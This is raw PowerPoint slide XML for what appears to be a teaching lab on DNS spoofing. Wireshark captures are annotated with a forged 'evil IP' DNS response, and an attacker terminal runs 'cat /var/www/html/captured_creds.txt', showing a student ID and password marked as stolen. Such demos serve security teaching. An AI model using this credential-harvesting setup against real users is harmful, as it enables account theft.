                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cat /var/www/html/captured_creds.txt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69A04752-4D4E-3C0E-8D3F-DB14F31C0346}"/>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evil</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFC66F49-12DF-A644-C42D-696931842E8C}"/>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9BA01C13-B5BA-1005-1C2C-FEFE7621FCB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6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B282228-8DBE-E5E0-7A4E-7E661FFC35D9}"/>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40" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE6A744F-EE79-54DC-0441-CE7FA8E8248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21509" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAFD4216-CD36-B242-9DD6-8636091192E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>view hacker database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33FC1AB7-99EB-3D75-680E-878D94598C28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C739FA0-9425-318A-148B-FA893B1FD20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21508" name="Rectangle 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{358A07E0-563D-07EC-9C51-43FFDBA87FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="6434123"/>
            <a:ext cx="181822"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800" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6BA3F02-8626-6D35-783B-5C0629EB33B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8452921" y="3948035"/>
            <a:ext cx="3594494" cy="521513"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -67701"/>
              <a:gd name="adj2" fmla="val -191490"/>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view the hacker's database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1832677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5C2FD-54EF-C774-F359-291217D25C97}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{812334DF-4375-62CB-1DF0-20DEE233B322}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="987993" y="2668276"/>
            <a:ext cx="10216014" cy="1521448"/>
            <a:chOff x="1364266" y="2378845"/>
            <a:chExt cx="10216014" cy="1521448"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E939E763-F53D-60D6-F674-8AF34B837C05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1364266" y="2668294"/>
              <a:ext cx="10216014" cy="123199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noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cat /var/www/html/captured_creds.txt</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>--- CAPTURE ---</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Id Student: 500500 | Password: Gatto26!</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B95887D-DCA9-2907-2A1C-93E38D3F1E5A}"/>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evil</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6B4C88E-62C6-D6D7-56AD-33DBC3925C4B}"/>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4EFB472E-7CD0-2306-C6F3-802E9F69C2B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6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47B04A0D-9716-4B2A-21B7-8FF00F05952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40" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{770312D3-7202-A890-FFEF-2118872572E2}"/>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21509" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDA28FD-1349-900D-3C4E-8C72EBC8CDB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>view hacker database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABCAF517-72B0-E206-BFCF-FA694925C3AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2FE98BD-22A7-13CD-B655-EA0591A23E04}"/>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21508" name="Rectangle 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED234520-A57D-F10E-F73E-9F875B7F7C6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="6434123"/>
            <a:ext cx="181822"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800" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52727FF2-8C5A-DEF1-FF68-9C45885CE8E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7609513" y="4314433"/>
            <a:ext cx="3594494" cy="778851"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -86863"/>
              <a:gd name="adj2" fmla="val -121432"/>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credentials stolen from the student</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1109928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en-US" noProof="0" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, elettronica, schermata, schermo&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADEF5DAE-55B9-7B91-18FC-DCA5DFC886FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="10527"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1246910" y="992084"/>
            <a:ext cx="9908770" cy="5373090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD2692A2-E9B5-2F7A-3004-CE5C8A7625AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9350941" y="2799600"/>
            <a:ext cx="2736850" cy="454239"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45304"/>
              <a:gd name="adj2" fmla="val -117815"/>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DNS response packet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5E6BFC1-5F89-9079-838A-1278FEA6008A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4670185" y="4405293"/>
            <a:ext cx="2736850" cy="430736"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -83487"/>
              <a:gd name="adj2" fmla="val -40802"/>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DNS query flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1038736-224C-3DF4-3254-959FD81A6049}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5870369" y="5010383"/>
            <a:ext cx="3073333" cy="855533"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -125808"/>
              <a:gd name="adj2" fmla="val 433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the name searched in the DNS query (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Qname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="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A2EF6-3685-A591-05A6-5CBE3CD8167C}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24578" name="Titolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3B9DC57-7D30-F08F-CAE8-E4A6A738D77D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4262C7B5-3E19-0EFD-333D-DABE27310BE1}"/>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72A90081-44F5-FD63-DE99-84A2C37AA24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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, elettronica, schermata, software&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A21E1161-9F43-A06F-2E13-C59BF8B2DABA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="5051"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1132115" y="1071433"/>
            <a:ext cx="9927770" cy="5381758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{729552A5-8E3D-59F6-6FD5-35B901A3E26F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6881960" y="4200641"/>
            <a:ext cx="2736850" cy="855533"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -99976"/>
              <a:gd name="adj2" fmla="val 161185"/>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DNS response with evil IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38E37C5D-AC8C-69AF-01F6-5C98C9E0B1D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9326398" y="1841523"/>
            <a:ext cx="2736850" cy="462290"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1124"/>
              <a:gd name="adj2" fmla="val 137317"/>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DNS response packet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3374673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1B1AE-9D4A-8F3D-62F9-5E9B9F4669E4}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24578" name="Titolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F01A47C-EAD5-9DAC-2EDB-B372A4418E6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1082FC01-086D-1782-7D80-AB9C31625CCA}"/>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4F6D1C5F-1620-F2A7-CBA5-B2343A36718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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Immagine che contiene testo, elettronica, schermata, software&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADB1D471-39E5-E8CB-E949-90B9E57BB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891" y="1002061"/>
            <a:ext cx="10550218" cy="5451130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB6EDEF9-95FD-4CCF-510C-D527FE117CE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
